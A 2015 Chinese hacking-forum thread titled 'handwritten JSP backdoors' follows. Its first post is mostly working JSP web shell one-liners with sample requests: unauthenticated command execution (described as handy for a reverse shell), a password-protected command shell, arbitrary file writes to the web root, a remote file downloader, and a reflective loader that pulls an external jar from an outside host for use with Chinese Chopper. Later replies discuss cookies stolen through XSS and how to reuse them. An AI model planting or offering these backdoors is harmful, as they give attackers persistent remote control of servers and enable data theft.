手写jsp后门

Delver_Si · 发表于 2015-1-2 18:46:57

转自：http://p2j.cn/?p=1627
一：执行系统命令:
无回显执行系统命令：
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
请求：http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
执行之后不会有任何回显，用来反弹个shell很方便。
有回显带密码验证的:
<% if("023".equals(request.getParameter("pwd"))){       java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();       int a = -1;       byte[] b = new byte[2048];       out.print("<pre>");       while((a=in.read(b))!=-1){          out.println(new String(b));       }       out.print("</pre>"); }%>
请求：http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

二、把字符串编码后写入指定文件的：
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求：http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
写入web目录：
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求：http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求：http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
写入web目录:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求：http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
三：下载远程文件(不用apache io utils的话没办法把inputstream转byte,所以很长…)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) {       baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray());%>
请求：http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
下载到web路径:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) {       baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray());%>
请求：http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
四：反射调用外部jar,完美后门
如果嫌弃上面的后门功能太弱太陈旧可以试试这个：
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
请求：http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

菜刀连接：http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar，密码023.

解：
利用反射加载一个外部的jar到当前应用，反射执行输出处理结果。request.getParameterMap()包含了请求的所有参数。由于加载的是外部的jar包，所以要求服务器必须能访问到这个jar地址。

admin · 发表于 2015-1-2 20:17:30

最近在研究jsp后门？

Delver_Si · 发表于 2015-1-2 20:39:44

admin 发表于 2015-1-2 20:17
最近在研究jsp后门？

jsp一句话见过吗？我找到了，没深入研究，xss都没搞懂，昨天好不容易拿到了cookies，不知道怎么修改cookie上传

admin · 发表于 2015-1-2 20:44:40

Delver_Si 发表于 2015-1-2 20:39
jsp一句话见过吗？我找到了，没深入研究，xss都没搞懂，昨天好不容易拿到了cookies，不知道怎么修改cooki ...

不会是用个性签名档盗取的我的cookies吧，，，

用火狐的HackBar插件

admin · 发表于 2015-1-2 20:48:57

Delver_Si 发表于 2015-1-2 20:39
jsp一句话见过吗？我找到了，没深入研究，xss都没搞懂，昨天好不容易拿到了cookies，不知道怎么修改cooki ...

鬼哥多功能浏览器v1.0
QQ截图20150102204803.jpg

鬼哥多功能浏览器v1.0.exe (72 KB, 下载次数: 7, 售价: 1 粒MB)

Delver_Si · 发表于 2015-1-2 20:57:50

admin 发表于 2015-1-2 20:44
不会是用个性签名档盗取的我的cookies吧，，，

用火狐的HackBar插件

昨天自由门抽风了，连不上，火狐商店进不去。

Delver_Si · 发表于 2015-1-2 20:59:01

admin 发表于 2015-1-2 20:44
不会是用个性签名档盗取的我的cookies吧，，，

用火狐的HackBar插件

dz没这漏洞吧

admin · 发表于 2015-1-2 21:00:22

Delver_Si 发表于 2015-1-2 20:59
dz没这漏洞吧

不知道你测试下吧不要把我数据库搞坏了就行

我们都是用Tor Browser翻墙啦

		自动登录	找回密码
密码			注册[Register]

[安全工具] 手写jsp后门

相关帖子